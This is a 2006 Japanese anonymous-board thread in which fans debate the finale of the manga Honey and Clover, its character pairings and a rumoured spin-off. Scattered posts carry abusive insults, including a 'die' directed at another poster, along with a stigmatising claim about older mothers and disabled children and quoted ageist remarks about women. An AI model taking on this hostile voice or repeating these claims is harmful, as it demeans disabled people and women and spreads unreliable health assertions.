822 :花と名無しさん:2006/08/04(金) 01:44:07 ID:???0
実際メンヘルとストーカーは相性が良い。

823 :花と名無しさん:2006/08/04(金) 01:52:31 ID:???0
野宮いらないの一言に尽きる作品でした
一人で救われないのに頑張ってる山田がかわいかったのに

824 :花と名無しさん:2006/08/04(金) 02:07:13 ID:???O
正直、竹本の自分探しの旅が一番面白かった。

825 :花と名無しさん:2006/08/04(金) 02:22:05 ID:???0
最初は野宮と山田もイイって思ってたけど
山田が別人に成り果てた今、いらないカポーだったと確信している
羽海野タンが萌え萌えなのが伝わりすぎちゃったせいかも

826 :花と名無しさん:2006/08/04(金) 02:25:40 ID:vQ+qpHUi0
真山と理花っていくつ違いなの?
教えてくりさい


827 :花と名無しさん:2006/08/04(金) 02:26:50 ID:???0
はぐも山田も(ついでにりかも?)何で一人で頑張ろうとしないんだ
一人で問題を乗り越えようとしないから、ちっとも共感できない

828 :花と名無しさん:2006/08/04(金) 02:29:26 ID:???O
でも納得は出来たぞ
でもあれだけしつこいくらい真山に似てると伏線あったし
進化系版真山の飲み屋に山田が惹かれるのは納得できる
しかも相手は完璧を脱ぎ捨てて真山と同じ青春スーツ装着
まあ飲み屋は山田にとっての救済キャラだよな

829 :花と名無しさん:2006/08/04(金) 02:31:01 ID:???0
修が35くらい?
てことはリカも・・・

830 :花と名無しさん:2006/08/04(金) 02:32:43 ID:???0
今は修30後半だったよね

831 :花と名無しさん:2006/08/04(金) 02:35:07 ID:???0
羽海野たん=リカ←めがね男子
     =はぐ←王子、主人公、堺萌え
     =あゆ←めがね男子ツー

832 :花と名無しさん:2006/08/04(金) 02:44:26 ID:???O
この作者って本名じゃないよね?

833 :花と名無しさん:2006/08/04(金) 02:46:46 ID:0nFH25Y/O
真山とリカ
森田とはぐ
山田と飲み屋

くらいはくっついてほしかったが…

ネタバレよんで、10巻読まない方がハチクロ好きにはいいのかもと思った
9巻もグロ&黒で泣けてきた

ハチクロ好きだったのになぁ

834 :花と名無しさん:2006/08/04(金) 02:54:37 ID:0nFH25Y/O
>>806
(´・ω・`)


FRIENDSみたいなグダグダでダラダラで続けてほしかったなハチクロ

835 :花と名無しさん:2006/08/04(金) 03:17:36 ID:???0
>>833
そのうち二つはくっついてるじゃないか
森田はぐも森田が仕切りなおすと言ってるし奴は諦めてない

最終回たけのこが柔らかく修はぐを否定してくれたからちゃんと爽快感はあるよ
一気にたけのこが男に見えた

836 :花と名無しさん:2006/08/04(金) 03:51:13 ID:???0
クローバーって牧草じゃなかったっけ
毒はないんじゃないかなあ


837 :花と名無しさん:2006/08/04(金) 07:47:06 ID:???O
>>832
羽海野なんて名字はないだろ

838 :花と名無しさん:2006/08/04(金) 08:00:51 ID:???0
結局竹本だけがひとりぼっちか・・・

839 :花と名無しさん:2006/08/04(金) 08:18:31 ID:???0
>>832
この人の初期の同人誌「海の近くの遊園地」と関係してるPNで
同人時代から使ってるペンネーム=羽海野チカ

840 :花と名無しさん:2006/08/04(金) 08:19:40 ID:???0
>>836
牛や山羊や羊やウサギがクローバー食う分には栄養になるけど
人間が食べるとおなか壊すよ。

ハチクロの描かれてないラストは、竹本下痢。

841 :花と名無しさん:2006/08/04(金) 08:29:02 ID:???O
禁断の5コマめが...

842 :花と名無しさん:2006/08/04(金) 08:42:02 ID:???0
>>835
でもそこは修はぐ否定派じゃないと読めないニュアンスだよね。
まったく玉虫色だこと

843 :花と名無しさん:2006/08/04(金) 08:45:25 ID:???0
はぐのサンドイッチ、ハチミツ塗ってあったのか。
なんのタレ!?と思って一人でガクブルしてた。

844 :花と名無しさん:2006/08/04(金) 09:03:18 ID:???0
リカと真山のカップルだけど
20代前半の男が、30代後半の女ゲトって
あんまりないよなぁ…。

逆(男のほうがうんと年上)ってのはよくあるけど。

845 :花と名無しさん:2006/08/04(金) 09:03:38 ID:CBH74cQfO
はぐはおばあちゃんにもあんな料理作って死なせたのかな。

846 :花と名無しさん:2006/08/04(金) 09:12:27 ID:???0
映画の森田みたいに唯我独尊タイプで才能を鼻にかけたキャラだったら
はぐに「お兄さんにそのセリフ言え」って言われて仕切りなおし
・・・で、才能と無才のテーゼもちょうどオチるのに。

原作森田だと、あのシーンではぐに描くなじゃなくって頑張れって言いそう。
最後あたりの展開はもうみんなキャラ崩壊で強引なんだよな・・・

847 :花と名無しさん:2006/08/04(金) 09:17:45 ID:???0
ガンバレはないとして、描くなといったとしても
行かないでまでは岩魚層。

848 :花と名無しさん:2006/08/04(金) 09:19:47 ID:???0
>844
職場が院なせいか年の差で女が上カポーは最近多いよ
最大差は10歳。リカくらいの年の美人でお嬢さんで×1の助手さん。
助教授が教授の公認で結婚申込んだの思いっきり振ったのに
学生時代から彼女が好きで追っかけてきたと公言してた10下の新米医とくっついちゃった。

849 :花と名無しさん:2006/08/04(金) 09:23:12 ID:???0
>>845
そうです
はぐ…恐ろしい子!

今回の、一応感動的っぽく見える最終回も
「はぐ=恐ろしい子」視点で見ると
つっこみどころがたくさんある。

はぐ、いつのまにか手が治ってるの?
はぐ、森田、もしくは、臭が好きなくせに
竹本とハグっちゃってるよ…。
本心は「臭ちゃんは わたしの だいじなだいじなひと」
なくせに、森田には「ずっとみてる」で心を縛り
竹本には、臭と一緒にいることを辛いかのように訴えて
同情をひく…。

はぐ、恐ろしい子!

はぐが幼い少女のようなルックスで描かれてるから
はぐへの叩きは(2ちゃんを除くと)少ないけど
もし、はぐが年相応の容姿で描かれてたら
「むかつくヒロイン」として
ブーイングの嵐になるのではないかと思う。

850 :花と名無しさん:2006/08/04(金) 09:28:25 ID:???0
>>848
そうなんだ…。
女が年上のカップルや夫婦は最近は多くて
全然珍しくないのはわかるんだ。
女の晩婚化と、いい男は早く売れることなせいで。
自分のまわりでも、夫や彼氏が1〜3歳位年下って人が結構多いし。

でも、女が10歳以上年が離れたカップルってのは
最近でもまだまだ珍しいんじゃないかなぁと思ってた。
私の認識が甘かったね。



851 :花と名無しさん:2006/08/04(金) 09:30:43 ID:???0
2ちゃんの男の書き込みでは
「30歳以上の女は死ね」「女は24歳以下じゃないと価値がない」
「年上女キモイ」「年上女は小柳ルミ子のように必ず将来捨てられる」
「ババァは価値がない」みたいのが多いけど・・・
ハチクロアニメスレでもリカは「ババァ」「30女」「オバ」などと叩きだらけ。

852 :花と名無しさん:2006/08/04(金) 09:38:08 ID:???0
>850
最近年の差カップルが増えてるけど
子供産めるかどうかを抜きにしたら
あとはもう女としての個体差じゃないかと思う。

30代の出来上がった綺麗な女と20代のデブスじゃ話にならないし。
あ、山田は若くて美乳美脚だけどねw

853 :花と名無しさん:2006/08/04(金) 09:42:43 ID:???0
>848補足
助手さん(30代半ば美人)が10歳下男と結婚した時に言ってた言葉
「先はわからないけど今一緒にいたいから
先に別れるならそれはそれで構わないし〜
同年代男性だと離婚の際にごたつきそうだけど
相手若いから別れてもやりなおせるでしょ」
まあ、この人は資産家のお嬢さんだから言えることではあるんだけどさw

854 :花と名無しさん:2006/08/04(金) 09:47:11 ID:???0
美人30代後半女だと、子供産めないから反対という人も多そうだね。
子供をつくるだけが結婚じゃないけどさ…。

855 :花と名無しさん:2006/08/04(金) 09:53:38 ID:???0
>>851
アニメ板のスレではそんな書き込み滅多に見ないんだけど…
どこの話?

856 :花と名無しさん:2006/08/04(金) 09:55:42 ID:???0
最近は高齢出産も増えて40代でも産んでいる人いるでしょ。
もっとも医者が少なくて出産自体が厳しい御時世だけどな!

857 :花と名無しさん:2006/08/04(金) 09:56:04 ID:???0
>>855
アニメ板のスレだよ

858 :花と名無しさん:2006/08/04(金) 09:56:46 ID:???0
30代後半だと知的障害者が生まれやすいんだよ
親戚の子は知的障害者だよ(マジ)

859 :花と名無しさん:2006/08/04(金) 10:01:32 ID:???0
従姉夫婦がちょうど10歳差(女が上)だ。
37で結婚してからだし高齢出産だと思うけど
子供二人とも健康で良くできた子だよ。
最近は高齢出産も増えたから
色々検査とかリスクを減らす方法があるようだよ。

860 :花と名無しさん:2006/08/04(金) 10:01:49 ID:???0
>>857
いつの話?札幌の回では真山キモ書き込みはあったけど、
理花叩きはむしろこっちの方が過激じゃない?

861 :花と名無しさん:2006/08/04(金) 10:04:51 ID:???0
>858は人間として大事なものが欠落してる
でもそれはもう治らないから仕方ないことだけどね、可哀想に。

862 :花と名無しさん:2006/08/04(金) 10:05:14 ID:rDC1YIAXO
読み返すほどタケノコのひとことが凄い。
臭はぐを一瞬で引っくり返すこのキレ味。将棋マンガかと思った。


863 :花と名無しさん:2006/08/04(金) 10:07:03 ID:???0
>>861
偽善乙。
実際に知的障害者が身近にいたら
綺麗事なんて言えないよ。
死ね。氏ねじゃなくて死ね。

864 :花と名無しさん:2006/08/04(金) 10:09:57 ID:rDC1YIAXO
産む前に結構わかるんじゃなかった?
いずれにしてもレアケース。

865 :花と名無しさん:2006/08/04(金) 10:10:16 ID:???0
障害児が産まれる条件は色々言われているけど、実際はそれほど確率変わらないらしい。
近親でも実は大して違わないそうだ。
逆に言うと、普通にしていても容赦なく障害児が産まれるという…

866 :花と名無しさん:2006/08/04(金) 10:10:58 ID:???0
>863
悪い言霊は発した相手に還れ

867 :花と名無しさん:2006/08/04(金) 10:14:02 ID:???0
>863
そういう事言うと何年かしてから自分に跳ね返ってくるよ
その時になって「ああ」と思い出すかも知れないね。
アナタの子や孫がかわいそう。

868 :花と名無しさん:2006/08/04(金) 10:16:07 ID:???0
>862
あの一言でタケノコは王子に出世したよね。
臭の呪いがかかって石化した姫を人間に戻した魔法の言葉

869 :花と名無しさん:2006/08/04(金) 10:20:39 ID:???0
自分は少女漫画板はこのスレしか見ていないんだが、
連載が終了してしまったのでこのスレもしばらくしたら
懐かし漫画板に移動しなければならないのだろうか?

ちょっと気になったので…

870 :花と名無しさん:2006/08/04(金) 10:21:10 ID:kYRuAB580
うーんーこっうーんーこっ




871 :花と名無しさん:2006/08/04(金) 10:23:52 ID:???0
例のスピンアウト次第でないのか>移行

872 :花と名無しさん:2006/08/04(金) 10:32:46 ID:???0
>866
言霊ってよく聞くけど、言っちゃってから後悔した時はどうしたらいいの?
時々失敗するけど言葉は取り返しがつかない?
神社とかいって謝ってきたらいいのかな?

873 :花と名無しさん:2006/08/04(金) 10:37:36 ID:???0
すいません

874 :花と名無しさん:2006/08/04(金) 10:41:48 ID:???0
「陰陽師」でも読めばいいじゃないかな

875 :花と名無しさん:2006/08/04(金) 10:45:41 ID:???0
>>863
親戚じゃなくあんたの子では?
いずれにしても若くない女性をすぐ子が埋めないとか叩くのはよくない。

876 :花と名無しさん:2006/08/04(金) 10:47:41 ID:???0
実際は、結構昔から超年上女房って地味にいるんだよねぇ。
どっちか死んでから歳が分かってビックリみたいな感じで。
まあ、今と違ってヒモの延長線上だったのかもしれないけど。

877 :花と名無しさん:2006/08/04(金) 10:47:48 ID:???0
>>862
確かにあれは誰もが形成不利(森田側からみて)の状況から
スコーンっとひっくり返したよね。見事。
臭ヲタにはホクホクしてたところを足元すくわれた感じ。

878 :花と名無しさん:2006/08/04(金) 11:57:03 ID:???0
>>877 修ヲタだったがはぐ相手にホクホクなんかしてない
悪夢 修はぐなんか悪夢
あれで臭が修にもどってくれるんなら
たけのこGJ
修には保健室の先生とか病院の先生とか
地味なのがいいです

879 :花と名無しさん:2006/08/04(金) 12:06:01 ID:???0
江戸時代くらい昔だと、出産経験のあるバツイチ年上女房は人気があったらしい。
問題は高齢初産なんだよね。

880 :花と名無しさん:2006/08/04(金) 12:10:33 ID:???0
>>878
そうなんだ。
でもあの感じだとタケノコの起死回生の一撃も
臭知らないよw とんだピエロだ。

881 :花と名無しさん:2006/08/04(金) 12:12:03 ID:???0
そのうちはぐに
「仕事は仕事で、臭ちゃんはやくいい人見つけてね」
「でも仕事は一生ちゃんとしてね」
とかいわれるんだよなw

882 :花と名無しさん:2006/08/04(金) 12:16:27 ID:???0
878の修ヲタですが
終盤の展開は
「親子」「親子」って書かれた白いオセロのコマが
「近親○○」って書かれた黒のコマに
一挙にひっくり返った気分で鬱ですた
単行本になるときはマジ書き直してほすい

883 :花と名無しさん:2006/08/04(金) 12:23:45 ID:???0
>>882
その黒有利の局面を最後の一手で白く塗り返したタケノコを
もっと褒めてあげてください。
あれがあるとないとじゃ全然違う。

884 :花と名無しさん:2006/08/04(金) 12:29:40 ID:???0
最終局面で
"歩兵"から"と金"に成った竹本のあの一撃は、まさに神の一手

885 :花と名無しさん:2006/08/04(金) 12:34:20 ID:???0
この鋭さがあれば将棋マンガも結構いけるんじゃないの?
女性棋士が名人になるまで描くならちょっと読みたいかも。
ある意味女の子がプロ野球目指すみたいなもんかな。

886 :花と名無しさん :2006/08/04(金) 12:38:27 ID:???0
次は取材ベースものってやつに挑戦してみたかったん
だろうか>羽海野氏

887 :花と名無しさん:2006/08/04(金) 12:53:54 ID:???0
>>882 >>878
あなた文や比喩がうまいわー。

888 :花と名無しさん:2006/08/04(金) 12:57:19 ID:???0
将棋界に好きな人がいて、お近づきになりたいだけだったりしてな…

889 :花と名無しさん:2006/08/04(金) 13:03:28 ID:???0
>>888
多分そうなんだろうな…。

890 :花と名無しさん:2006/08/04(金) 13:08:47 ID:???0
臭はぐ展開でガーン!となって
コミックスを一気売りしてしまった人のうち
最終回が(おかしなところは目をつぶれば)なかなか良かったので
やっぱりコミックスを買い戻したなんて人いないかな?

891 :花と名無しさん:2006/08/04(金) 13:08:51 ID:???0
修はぐなんてウミノさんしか喜んでなかったんじゃん
間違ってたんだよ。直せ。

892 :花と名無しさん:2006/08/04(金) 13:14:08 ID:???0
>>891
最終回読め!

893 :花と名無しさん:2006/08/04(金) 13:20:52 ID:???0
修はぐは100万部発行の威力でTVや新聞広告にも文字が躍るメインでやり、
その訂正はフライデーの最後のページに小さい字でちょびっと載せて
誤魔化しただけじゃん。
これじゃ直したって言わないよ。

894 :花と名無しさん:2006/08/04(金) 13:29:04 ID:0nFH25Y/O
>>890
俺のことか!

895 :花と名無しさん:2006/08/04(金) 13:46:04 ID:???0
>>894
(´∀`) ノ(´Д`)

本当にいたんだ。
ヨシヨシ♪


スピンオフが正直心配。
スピンオフはウミノ☆さんの萌え萌え展開でひっぱるだろうし。
誰の話になるのか知らんが
正直、もう真山とリカさんの話はおなかいっぱいでいらないな。

896 :花と名無しさん:2006/08/04(金) 13:58:35 ID:rDC1YIAXO
タケノコの一手の重みがわかってないやつ多すぎ。

897 :花と名無しさん:2006/08/04(金) 14:01:06 ID:???0
じゃーそれが反映した結構長めの書き下ろしを単行本限定で書くつもりなのか?
スピンオフとは別に。

898 :花と名無しさん:2006/08/04(金) 14:01:59 ID:???0
>896
あれだけじゃ、まだどうとでも転べそうだし。
スピンオフさえなければ、臭がピエロってだけで済むんだけどな。

899 :花と名無しさん:2006/08/04(金) 14:07:15 ID:???0
コミクス10巻、最終話まで収録されても
まだ2話分くらいの空きがある。
・真山の合コン話
・他の番外編
・作者あとがきロングバージョン
あたりが収録されて、
スピンオフは入らない、と予想

900 :花と名無しさん:2006/08/04(金) 14:08:51 ID:???0
そーいえば真山合コン壊滅話は入ってないんだよな。
アニメにはなっているのに。
9巻に入らなかったのは単純に計算ミス?
掲載紙またがったから難しかったのかもしれないけど。

901 :花と名無しさん:2006/08/04(金) 14:12:11 ID:???0
秋のスピンオフは10巻には入れないで
ヒカルの碁18巻のように
スピンオフだけのハチクロ単行本を作るのかもねぇ。
http://www.amazon.co.jp/gp/product/4088732898/

902 :花と名無しさん:2006/08/04(金) 14:14:42 ID:???0
このスレ進行はやいね

903 :花と名無しさん:2006/08/04(金) 14:18:45 ID:???0
>>901
読者にも評判良いみたいだねぇ。
公式の同人誌みたいでウミノも好きそうなやり方だ…

904 :花と名無しさん:2006/08/04(金) 14:20:25 ID:???0
>>894
もう中古もでてきたんだ、でも映画があったからもう少し沈静化してから買おうかな

905 :花と名無しさん:2006/08/04(金) 14:22:13 ID:???0
>>901
あー…なんかそれやりそうだね。

"キャラ読切シリーズ4本を一挙に収録した番外編登場。
野宮匠・原田リカ・花本修司・山崎一志&勅使河原美和子という、
本編を盛り立てる5人の魅力が一段と輝くストーリー満載。
お馴染みのキャラの、意外な一面も!?"

906 :花と名無しさん:2006/08/04(金) 15:16:55 ID:???0
スピンオフで修ちゃんの話を描くとしたら
原田とリカと修の過去話がいいな。

修ちゃんとはぐの恋愛の話はイヤぽ。
修ちゃんが臭になるし。

907 :花と名無しさん:2006/08/04(金) 15:36:54 ID:???0
>>902
ヒント:腐

908 :花と名無しさん:2006/08/04(金) 15:37:07 ID:???O
え、修ちゃんとはぐがくっついてオワタってホント?

909 :花と名無しさん:2006/08/04(金) 15:57:07 ID:???0
>>908
その辺は曖昧な感じ

910 :花と名無しさん:2006/08/04(金) 17:48:44 ID:???O
>>907
腐のせいと決めつけるいつもの痛々しい儲乙

911 :花と名無しさん:2006/08/04(金) 18:38:39 ID:???0
>>908
寸前でタケノコがはぐを呪縛から解放。

912 :花と名無しさん:2006/08/04(金) 18:40:50 ID:0nFH25Y/O
ハチクロって女男どっちに人気あるのかなぁ?
セックスシーンは真山とリカだけだから女から人気ないか

913 :花と名無しさん:2006/08/04(金) 18:42:52 ID:???0
なんでそういうシーンがないと女には好まれないと思うんだ?

914 :花と名無しさん:2006/08/04(金) 18:52:53 ID:???0
a

915 :花と名無しさん:2006/08/04(金) 19:08:22 ID:???0
この漫画にはそういうものは求めてない

916 :花と名無しさん:2006/08/04(金) 19:38:42 ID:0nFH25Y/O
>>913
成人以降 恋愛はセックス込み
小中   今時処女が許されるのって小学(略

みたいな感じかな、と
愛はなくてもその場のノリと快楽で

とか考えてる俺は25、もうおじさんだなorz

917 :花と名無しさん:2006/08/04(金) 19:43:18 ID:HyKZ3wdM0
えっ!?連載、終わったの?

918 :花と名無しさん:2006/08/04(金) 19:48:22 ID:1DnlLstL0

ローマイヤ先輩ハム 絶賛発売中
http://wwwz.fujitv.co.jp/b_hp/hachikuro2/index.html

919 :花と名無しさん:2006/08/04(金) 19:53:15 ID:???0
>>916
そういうノリで生きているのは勘違いした馬鹿な子だけだって
セクースしてりゃ偉いと思い込んでるDQNの言う事に惑わされるのはどうかと思うよ

920 :花と名無しさん:2006/08/04(金) 19:55:51 ID:???0
>>916
916さん、マスコミとかテレビとかに毒されてると思う。

エチーが早い子は確かに早いけど
中学や高校でも純情な子なんかたくさんいるし
23歳まで処女だった子も知ってるし。
(別にブスではない。むしろ可愛い。子供の頃酷い痴漢にあって
 男性恐怖症なためずっとセックルができなかった子)

自分が女子高生の頃も
マスコミに「最近の女子高生は援助交際をしてるのが当たり前」
のように報道されて、またそれを信じる大人の男もいて
すごくムカーときたもんだよ。



921 :花と名無しさん:2006/08/04(金) 19:56:38 ID:???O
スゲー偏った考えだな
中学生の処女は珍しくないし

922 :花と名無しさん:2006/08/04(金) 20:01:28 ID:???0
>>921
2ちゃんに書き込む男には、マスゴミやエロ本を信じて
916みたいに思ってる男が時々いるよ。
2ちゃんに書き込む女にも時々いる。


923 :花と名無しさん:2006/08/04(金) 20:01:59 ID:???O
>>916
25才だから10代の価値観をわかってないんじゃないかと思ったが…

実は女知らないんじゃないのw

924 :花と名無しさん:2006/08/04(金) 20:09:37 ID:???0
ちがうって。童貞の数だけ処女はいるって事だ。男女に
差は無いだろ。多少、女で経験済みが早いのは仕方ない。だが、
中学生辺りで普通にセックルしてるのって、ヤンキーとか派手な子とか
遊んでる子ぐらいだよ、実際。




925 :花と名無しさん:2006/08/04(金) 20:15:56 ID:???0
>>916
アホか。

2ちゃんの純情恋愛板でも見に行ったら?
普通の中高生で、「好きな子の前でドキドキする」とか
「メールだけでドキドキする」みたいな子がたくさんいるから。

926 :花と名無しさん:2006/08/04(金) 20:20:31 ID:???O
sageられないお馬鹿さんをそんなに構ってあげなくても…

927 :花と名無しさん:2006/08/04(金) 20:27:44 ID:WTV9eY1XO
http://124.38.226.98:81/bbs/64028/t240/0029175854.jpg

928 :花と名無しさん:2006/08/04(金) 20:41:20 ID:???0
みんな916があまりにも世間知らずのオタボーイだから
構ってあげてるんだよ。
ってか25でその感性はおかしい。エロ漫画読んでる中高生男子が
みんなヤリチンって言ってるようなもんだぞ。
実際は外で相手がいる場合、そういうのは必要としないもんだ。
道程ほど、エロ漫画は実用品だろう。

929 :花と名無しさん:2006/08/04(金) 20:46:08 ID:???O
>>916は少女漫画板でセックス語ってる時点で童貞ロリコン
ここには目当てのロリはいないのに、住人が若いと思って構ってほしいんだな
ここはお前より年上ばかりだぞww

930 :花と名無しさん:2006/08/04(金) 20:47:28 ID:???O
>>919-922
やっぱり考えが片寄ってたか
自分も自分の周りも普通に彼氏彼女いるけどマスコミの情報鵜呑みにしたらダメだな

931 :花と名無しさん:2006/08/04(金) 20:52:10 ID:???0
まぁ916をあんまりいじめてやるなよ。
おれは916より10歳上のオヤジ(既男)だけど
高校生の頃に遊人の「校内写生」を読んで内容を真に受けて
「最近の女子高生にはブス以外処女はいないのか…_| ̄|○
 おれなんて彼女できたことすらないのに…」
と真剣に落ち込んだことがあんだから。
童貞毒喪だった俺も同じ勘違いしてたからわかるよwww


932 :花と名無しさん:2006/08/04(金) 20:54:19 ID:???O
ハチクロの話しろ
お前の考えなんか興味ない
オナニーレスしてんなハゲロリキモヲタ

933 :花と名無しさん:2006/08/04(金) 20:59:39 ID:???O
>>930-931
市ねクソガキども

934 :花と名無しさん:2006/08/04(金) 21:21:48 ID:???0
たけのこの言葉で喜んでる人が多いね。
あれで「あっそうか、な〜んだ。見返りは私の作品でいいんだ☆」
と納得しちゃう様なら、はぐがますますイヤな女になってしまうから
個人的にはイヤだな。

935 :花と名無しさん:2006/08/04(金) 21:21:56 ID:???O
ぶっちゃけ 最終回のはぐのセリフにムカムカしてる
修ちゃんに返さなきゃ....
竹本フォロー?
はぐ涙
そんな、修の存在が重みみたいな発言と雰囲気だすなら止めろ!1人で頑張れやと言いたい
修好きな俺にはイライラ


936 :花と名無しさん:2006/08/04(金) 21:25:39 ID:???0
山田って、ずるずる真山ひきずってたけど、
途中からやけっていうか、
ここで野宮になびいたら自分の片思いの歴史が・・・アイデンティティーが・・・
という感じになってたのかと思ってたんだけど違うの?
飲み屋の解釈は違うみたいね。

937 :花と名無しさん:2006/08/04(金) 21:27:32 ID:???0
私は単なるたけのこ好きの厨だから
「最終回でやっと久しぶりに
 たけのこにスポットがあたったーバンザーイ!」
と単純に喜んでるだけですが
確かにはぐみ、ひどい女だねw
恐ろしい子だから仕方ないと思っています。

938 :花と名無しさん:2006/08/04(金) 21:40:09 ID:???0
最終回、よかったと思うのだが。
結局、竹本の成長物語なんだしさ。スガとスピッツからハチクロだったとしても、
いっぱいの四葉のクローバーは、修ちゃんがモンゴルに行く前にはぐが必死で
クローバーを探していたところとリンクししてじんわりきたよ〜。

939 :花と名無しさん:2006/08/04(金) 21:41:30 ID:???0
ありゃいくらなんでもいっぱいすぎる・・・

はぐの成長は、四葉のクローバー探すのがうまくなったこと?

940 :花と名無しさん:2006/08/04(金) 21:45:36 ID:???0
このスレ見てから
はぐ以外の全員が、並んで白目むいて「はぐ…恐ろしい子」って言ってるコマが、頭に浮かんではなれない。

941 :花と名無しさん:2006/08/04(金) 21:48:16 ID:???0
恐ろしい子のはぐが
欲しいものは何でも手に入る
はぐノートを抱えてキシャーと笑ってるのが
思い浮かびます


才能
邪魔なババァの病死
ミュール
森田の心
修の心
竹本の心
身長
完治した手

942 :花と名無しさん:2006/08/04(金) 21:49:30 ID:???0
>939
四つ葉ってクロバーはほんとは三つ葉のはずが
踏まれたりして刺激で突然変異したものだから
あの時みんなで探しまくって踏みまくったからでは?w

943 :花と名無しさん:2006/08/04(金) 21:52:19 ID:???0
>>939
きっとヤフオクで買ったのさ

944 :花と名無しさん:2006/08/04(金) 21:52:23 ID:???0
>>941
うおっ、恐ろしい子・・・

四葉のクローバーも追加ね。


945 :花と名無しさん:2006/08/04(金) 21:53:11 ID:???0
>>943
ワロス

946 :花と名無しさん:2006/08/04(金) 22:23:09 ID:MI7/18/90
やっぱりサンドイッチに塗ってあったのはハチミツ?
ハチミツと四葉のクローバーで最後にハチクロなんてダジャレなのかな?

947 :花と名無しさん:2006/08/04(金) 22:26:56 ID:???O
ヤバい はぐか嫌いになって....

948 :花と名無しさん:2006/08/04(金) 22:28:43 ID:???O
クローバーちゃんと洗って挟んだのかな......

949 :花と名無しさん:2006/08/04(金) 22:34:37 ID:???0
タイトルの印象がガラッと変わりました

950 :花と名無しさん:2006/08/04(金) 22:36:09 ID:???0
>>935
確かに。自分から進んで修に頼りたいんじゃなくて
仕方なしに選んだ感を出しすぎ。
それがあっても竹本の前で出しちゃだめだよね

951 :花と名無しさん:2006/08/04(金) 22:38:10 ID:???0
最終回の前に9巻のあとがき読んでいなければよかった。
倉持君のお見舞い絵の前に真心の倉持さんが森田の元ネタの一人だなんて知らなければ良かった。

952 :花と名無しさん:2006/08/04(金) 22:44:07 ID:???O
すんません、俺男なんですが、
ハチクロって男性が見てもおもしろいんですかね?
アニメおもしろかったんで漫画も見てみようかなとは思ってるんですが

953 :花と名無しさん:2006/08/04(金) 22:47:56 ID:???O
>>952
1巻はちょっといかにも少女漫画でキツいかもしれんが
徐々に平気になるかも


俺はそうだった

954 :花と名無しさん:2006/08/04(金) 22:51:22 ID:???0
結局、はぐは州に恋愛感情あるの?
修は「すきさすきさ」だから恋愛感情があるっぽいけど。
ちうか、修ちゃん唯一の大人の男っぽくて好きだったのに、
「すきさすきさ」のおかげで、一瞬で光源氏願望のロリに成り下がりました。

955 :花と名無しさん:2006/08/04(金) 22:56:39 ID:???0
>>954
はぐみ=作者と捉えると…

956 :花と名無しさん:2006/08/04(金) 22:57:43 ID:???O
修の好きさは 普通の恋愛感情じゃないと思ってる
原田やリカに対しての感情と似てる気がする


957 :花と名無しさん:2006/08/04(金) 23:01:03 ID:???0
そう思いたいけど山田に男性として云々といわれて(心の声だったかも)、その時否定しなかったよ?

はぐの気持は
修:家族愛
森田:恋愛
竹本:親友
てのが妥当なところだろうか。

958 :花と名無しさん:2006/08/04(金) 23:04:20 ID:???O
好きさ好きさ
先生も男
人生くださいが三大癌

959 :花と名無しさん:2006/08/04(金) 23:07:11 ID:???0
はぐ、自転車で竹本の後ろに乗っているとき、しっかり乳を押し付けているな。

はぐ、計算高い子・・・。

960 :花と名無しさん:2006/08/04(金) 23:10:28 ID:???0
なんでそこまで、
は ぐ って嫌われるんだろう。

ていうか、なんでそこまで
は ぐ を嫌うことができるんだろう。

ただのお話の登場人物じゃないの。
そこまで感情移入できる腐女子って凄い……

961 :花と名無しさん:2006/08/04(金) 23:12:42 ID:???O
2ちゃんだから漫画のキャラの話しつこくしてるだけじゃん
じゃなきゃ2ちゃんにくる意味ないじゃん

962 :花と名無しさん:2006/08/04(金) 23:25:02 ID:???0
>>960
はいはい道程乙

963 :花と名無しさん:2006/08/04(金) 23:28:10 ID:???0
>>934
竹本が何も返さなくていい、はぐちゃんがあげるものではないって言ってるのに
何で『見返りは私の作品でいいんだ☆』となるの?

964 :花と名無しさん:2006/08/04(金) 23:29:36 ID:???0
>>960
あたし、腐男子。

965 :花と名無しさん:2006/08/04(金) 23:36:39 ID:???0
ていうかはぐちゃんがあげるものではなくて先生が自分で見つけるべきものって
一体ナニ?なんなの?

966 :花と名無しさん:2006/08/04(金) 23:48:12 ID:???0
女の操

967 :花と名無しさん:2006/08/04(金) 23:49:56 ID:???0
>>965
次の職

968 :花と名無しさん:2006/08/04(金) 23:51:03 ID:M7x8uByi0
>>962
臭のお相手♪
臭は見つけたつもりなのにタケノコ鬼だよなw
このかいしんのいちげきで溜飲下がったわ。

969 :花と名無しさん:2006/08/04(金) 23:52:29 ID:???0
>>965
理性

970 :花と名無しさん:2006/08/04(金) 23:55:41 ID:???0
っていうか、なんで修ちゃん大学辞めちゃったの?
助教授なら大したものなのに。


971 :花と名無しさん:2006/08/04(金) 23:57:00 ID:???0
>>965
希望=幸福=四つ葉のクローバー

はぐ「オメーはハチクロサンドにして食うのがお似合いなんだよ!
アタシはそんな雑草食わなくても間に合ってるがな!」

972 :花と名無しさん:2006/08/05(土) 00:00:40 ID:???0
修って助教授じゃなくて教授じゃなかった?

973 :花と名無しさん:2006/08/05(土) 00:09:55 ID:???0
>>971
かっこよすwwwww
ジョジョっぽいなw

974 :花と名無しさん:2006/08/05(土) 00:23:20 ID:???0
スピッツで終わればよかったのに、一気に興ざめ

975 :花と名無しさん:2006/08/05(土) 00:27:19 ID:PUa1zPSv0
理花って本当に自殺したの?

976 :花と名無しさん:2006/08/05(土) 00:38:40 ID:???0
うん

977 :花と名無しさん:2006/08/05(土) 00:51:06 ID:PUa1zPSv0
>>976
kwsk

978 :花と名無しさん:2006/08/05(土) 00:55:48 ID:???0
最終巻を待て
としか言えない

979 :花と名無しさん:2006/08/05(土) 00:56:55 ID:???0
話ぶたぎります。

ウミノ先生のインタビューが載ってる『Girlie』って雑誌の
バックナンバーが売ってるのを見つけて読んだら
「パン屋の一平さんのアナザーストーリーを既に作ってある」って言ってたよ。

スピンオフちょっと楽しみになりますた。



980 :花と名無しさん:2006/08/05(土) 01:02:13 ID:???0
>>965
はぐという人間のために(=自分のために)、血や肉を捧げてまでも関わりを持ち続けることの「意味」。

ちなみに竹本は5年かかってそれ(意味)を見つけた。ってか「気づいた」。

981 :980:2006/08/05(土) 01:04:04 ID:???0
ごめん、間違った

×5年かかって
○4年かかって

982 :花と名無しさん:2006/08/05(土) 01:11:26 ID:???0
そろそろ次スレ...

983 :花と名無しさん:2006/08/05(土) 01:38:16 ID:???O
>>960
また腐女子のせいにするイタタ儲かよ。
つーか腐嫌いってことは、はぐ萌えのキモロリ厨か?

とっとと巣に帰れば?

984 :花と名無しさん:2006/08/05(土) 01:40:47 ID:???O
てか漫画は何巻で最終回なんですかい?
